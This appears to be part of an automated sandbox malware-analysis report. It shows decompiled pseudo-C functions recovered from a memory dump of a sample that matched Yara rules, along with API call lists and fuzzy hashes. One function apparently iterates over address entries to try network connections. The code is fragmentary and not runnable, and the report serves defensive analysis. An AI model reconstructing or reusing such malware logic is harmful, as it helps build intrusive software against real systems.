                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					return _t15;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E00AF97ED(0xb0e700);
                                                                                                                                                                                                				_t19 = GetCurrentProcess();
                                                                                                                                                                                                				_t20 = GetCurrentThread();
                                                                                                                                                                                                				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xb0e6ec, 0, 0, 2);
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t24 =  *0xb0e6e8; // 0x4d3fb90
                                                                                                                                                                                                				_v28 = _t24;
                                                                                                                                                                                                				_t61 = E00AF1A01( &_v28, E00AF1310, _t71);
                                                                                                                                                                                                				if(_t61 >= 0) {
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push( *0xb0e760);
                                                                                                                                                                                                					_t48 = 0x27;
                                                                                                                                                                                                					E00AF9ED1(_t48);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_v24 != 0) {
                                                                                                                                                                                                					E00AF6871( &_v24);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t26 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t26 + 0x30))( *0xb0e6ec);
                                                                                                                                                                                                				_t28 =  *0xb0e758; // 0x0
                                                                                                                                                                                                				 *0xb0e6ec = 0;
                                                                                                                                                                                                				_t29 =  !=  ? 1 : _t28;
                                                                                                                                                                                                				_t46 =  *0xb0e6f4; // 0x380
                                                                                                                                                                                                				 *0xb0e758 =  !=  ? 1 : _t28;
                                                                                                                                                                                                				E00AFA51D(_t46);
                                                                                                                                                                                                				_t15 = _t61;
                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00B0E6EC,00000000,00000000,00000002), ref: 00AF1BB5
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AF1BB8
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00AF1BBF
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00AF1BC2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3566409357-0
                                                                                                                                                                                                • Opcode ID: 6557f3509df8c32be2faaa45f07fce551f3ff565a6f4825a355a6b2377201a5f
                                                                                                                                                                                                • Instruction ID: 73fac598a67c4f8d711093f6a50e7e7ed67a20574a7b92f1bbe6d1eb99d1f837
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6557f3509df8c32be2faaa45f07fce551f3ff565a6f4825a355a6b2377201a5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 70317C71604219DFD718EFA4ED8993A77A8EB74390B000D68F726C72A1DE31EC05CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                			E00AF1A01(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				CHAR* _v20;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				signed short _t23;
                                                                                                                                                                                                				CHAR* _t24;
                                                                                                                                                                                                				CHAR* _t25;
                                                                                                                                                                                                				CHAR* _t33;
                                                                                                                                                                                                				char _t38;
                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t75 = __fp0;
                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                				_v16 = __edx;
                                                                                                                                                                                                				_t38 = 0;
                                                                                                                                                                                                				_t55 =  *0xb0e6f0; // 0x4d32d68
                                                                                                                                                                                                				_push(_t59);
                                                                                                                                                                                                				_t60 = _t59 | 0xffffffff;
                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                				_t65 = _t60;
                                                                                                                                                                                                				if( *_t55 != 0) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					_t23 =  *0xb0e6fc; // 0x0
                                                                                                                                                                                                					_t73 = _t23;
                                                                                                                                                                                                					if(_t23 == 0) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t25 = E00AF15F3(_v16, _t55, _t73, _t23 & 0x0000ffff, _t39);
                                                                                                                                                                                                						_t65 = _t25;
                                                                                                                                                                                                						if(_t65 < 0) {
                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t49 =  *0xb0e778; // 0x4d3f9f0
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_t57 = 0x2d;
                                                                                                                                                                                                					_v8 = E00AF9F60(_t49, _t57);
                                                                                                                                                                                                					_t33 = E00AF9E47(0x2e);
                                                                                                                                                                                                					_t58 = _v8;
                                                                                                                                                                                                					_v20 = _t33;
                                                                                                                                                                                                					if(_v8 != 0 && _t33 != _t60) {
                                                                                                                                                                                                						_t52 =  *0xb0e6f0; // 0x4d32d68
                                                                                                                                                                                                						E00AF96AB(_t52, _t58, 0x100);
                                                                                                                                                                                                						 *0xb0e6fc = _v20;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF85FB( &_v8, _t60);
                                                                                                                                                                                                					_t55 =  *0xb0e6f0; // 0x4d32d68
                                                                                                                                                                                                					if( *_t55 == _t38) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_v8 = _t38;
                                                                                                                                                                                                						_t24 = E00AF175E( &_v8, _t75);
                                                                                                                                                                                                						_v20 = _t24;
                                                                                                                                                                                                						__eflags = _t24;
                                                                                                                                                                                                						if(_t24 != 0) {
                                                                                                                                                                                                							__eflags = _v8 - _t38;
                                                                                                                                                                                                							if(_v8 > _t38) {
                                                                                                                                                                                                								_t14 =  &(_t24[4]); // 0x4
                                                                                                                                                                                                								_t63 = _t14;
                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                									__eflags =  *_t63;
                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                										__imp__#12(0x10);
                                                                                                                                                                                                										lstrcpynA( &_v36, _t24,  *_t63);
                                                                                                                                                                                                										_t24 = E00AF15F3(_v16,  &_v36, __eflags,  *(_t63 + 4) & 0x0000ffff, _v12);
                                                                                                                                                                                                										_t65 = _t24;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									__eflags = _t65;
                                                                                                                                                                                                									if(_t65 >= 0) {
                                                                                                                                                                                                										break;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t38 = _t38 + 1;
                                                                                                                                                                                                									_t63 = _t63 + 0x20;
                                                                                                                                                                                                									__eflags = _t38 - _v8;
                                                                                                                                                                                                									if(_t38 < _v8) {
                                                                                                                                                                                                										continue;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t60 = _t63 | 0xffffffff;
                                                                                                                                                                                                								__eflags = _t60;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E00AF85FB( &_v20, _v8);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						__eflags = _t65;
                                                                                                                                                                                                						_t61 =  >=  ? _t65 : _t60;
                                                                                                                                                                                                						_t25 =  >=  ? _t65 : _t60;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t39 = _v12;
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t25;
                                                                                                                                                                                                			}
























                                                                                                                                                                                                APIs
                                                                                                                                                                                                • inet_ntoa.WS2_32(00000004), ref: 00AF1AC4
                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000000), ref: 00AF1ACF
                                                                                                                                                                                                  • Part of subcall function 00AF96AB: memset.MSVCRT ref: 00AF96D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: inet_ntoalstrcpynmemset
                                                                                                                                                                                                • String ID: @}3u
                                                                                                                                                                                                • API String ID: 129148211-847092897
                                                                                                                                                                                                • Opcode ID: 03ff665f268579519a230c0fcf97fdedae276ecfd6d76f8f5424e134ff93c5b6
                                                                                                                                                                                                • Instruction ID: 326903f45c1d2d3fad2ea630adf283b232abc7cde1ce077791de7f8956d9272f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 03ff665f268579519a230c0fcf97fdedae276ecfd6d76f8f5424e134ff93c5b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C31E576E0121EEBDB15EBE4E9809BEB7B5FB44350B24455AF610AB280DF31DE40CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%